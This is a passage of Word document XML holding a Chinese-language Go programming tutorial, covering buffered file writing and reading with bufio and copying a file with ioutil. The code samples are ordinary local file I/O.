          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>句柄</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10369A2B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    defer file.Close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C52C74" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C4726E6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>写入文件时，使用带缓存的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> *Writer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AC0758" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>write := bufio.NewWriter(file)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A280E1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    for i := 0; i &lt; 5; i++ {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F36FD46" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>write.WriteString("C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>语言中文网</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve"> \r\n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9F2F7D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44ED85B5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    //Flush</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将缓存的文件真正写入到文件中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672F4C8A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    write.Flush()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C983788" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16971761" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D6895D7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>读</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70493C62" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>要读到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>EOF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>才结束</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449E6F4A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D20551C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>package main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6DC3E0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A0044C4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475AC541" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    "bufio"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004E3558" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    "fmt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53612591" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    "io"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EB1926" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    "os"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66309720" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71229C09" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57C8F74F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C47D38" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    filePath := "e:/code/golang.txt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3404C049" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    file, err := os.OpenFile(filePath, os.O_RDWR|os.O_APPEND, 0666)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35517C6C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121F1527" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        fmt.Println("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件打开失败</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>", err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7B2B72" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093E89B0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>及时关闭</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>句柄</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F34CD2D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    defer file.Close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AFFF94" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65ECAE80" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>读原来文件的内容，并且显示在终端</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43EF4741" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>reader := bufio.NewReader(file)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8D71E3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    for {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4656F32C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>str, err := reader.ReadString('\n')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BBB36F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>if err == io.EOF {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDF51A4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114BA96B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAF2120" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        fmt.Print(str)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F968564" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C883316" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="601C79BA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>写入文件时，使用带缓存的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> *Writer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F76D140" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    write := bufio.NewWriter(file)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4667AE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    for i := 0; i &lt; 5; i++ {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44045979" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        write.WriteString("Hello</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语言中文网。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> \r\n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E959EF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142C2402" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    //Flush</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将缓存的文件真正写入到文件中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6E0FB4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    write.Flush()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255D6853" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B77FC6A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="151B3432" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>复制文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAE12CB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6413CB2A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>package main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6665E6CB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E53E018" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C8FD92" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    "fmt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B47F77" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>"io/ioutil"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8ABF44" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD84EAB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="344EF474" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5404C335" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    file1Path := "e:/code/golang.txt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C1A384" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    file2Path := "e:/code/other.txt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AAE1F0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>data, err := ioutil.ReadFile(file1Path)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AA65A4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420A19EC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        fmt.Printf("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件打开失败</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>=%v\n", err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189153C5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4768A9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4086E8CC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>err = ioutil.WriteFile(file2Path, data, 0666)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129DA5F1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F3BB22" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
